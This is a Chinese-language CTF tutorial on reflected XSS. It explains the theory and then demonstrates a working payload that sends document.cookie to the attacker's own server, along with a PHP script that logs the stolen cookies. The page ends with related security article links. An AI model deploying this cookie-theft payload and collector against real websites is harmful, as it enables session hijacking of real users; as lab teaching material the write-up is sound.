反射型XSS--理论

什么是XSS?

XSS(Cross Site Script),即跨站脚本攻击。

攻击的基本过程:

  1. 攻击者在Web页面里插入恶意的js代码;
  2. 用户浏览该页面时,嵌入界面的恶意代码被执行;
  3. 攻击者达到攻击目的。

XSS的三种类型:

  1. 反射型XSS
  2. 存储型XSS
  3. DOM型XSS

今天我们讲反射型XSS相关内容。

什么是反射型XSS?

攻击者事先在Web页面中植入恶意代码,一般是攻击链接。

当用户进入页面时,恶意代码不会自动执行,而是需要用户自己去点击链接后,反射型XSS攻击才会进行。

理论就是这么多,接下来我们举几个实例,来熟悉反射型XSS攻击的原理与恶意代码的形式。

实操环节!

注意看,这个题目叫反射型XSS:

当我们在祝福语文本栏写下内容,再点击生成链接,下方就会出现我们输入的内容。

例如输入Wh1teR0se:

页面既然回显了我们输入的内容,说明这个内容被写入了网页的HTML中。

查看源代码,果然发现我们输入的内容:

那我们就可以设想,既然输入的内容被写入了HTML中,那我们输入js代码,代码自然也会被写入HTML,网页不就能执行我们写入的代码了吗?

输入代码:<script>alert(1);</script>

js代码果然被执行。

那么我们输入恶意代码,获取"用户"的Cookie。

这里是一道CTF题目的靶机,当然不会有别的用户,这里的"用户"指的是网站配备的BOT,一般在XSS题目中,都会配备一个BOT来模拟用户的访问。所以我们输入恶意代码后,该BOT就会自动触发我们的恶意代码。

javascript 复制代码
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

location.href 是页面跳转属性,后面是要跳转到的页面。
document.cookie 读取页面Cookie。
xx.xx.xx.xx是自己的服务器。这里不能用127.0.0.1,因为本地服务器只有你自己能访问到,其他人是不能访问的,自然也就不会成功重定向到你的服务器。没有服务器的需要自己搭建一个服务器。

代码作用就是当用户进入我们植入js恶意代码的页面后,将被重定向到我们指定的URL,并且我们能获取到该用户的Cookie。

php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

该文件的作用是将cookie保存在cookie.txt文本文件中。

输入恶意代码后,成功跳转到自己的服务器。这时查看文本文件。
得到flag.

反射型XSS的基本攻击原理就是这样,希望你能学会。

相关推荐
treesforest15 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安15 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售15 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手15 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub15 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61115 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux15 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc15 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing15 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵15 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全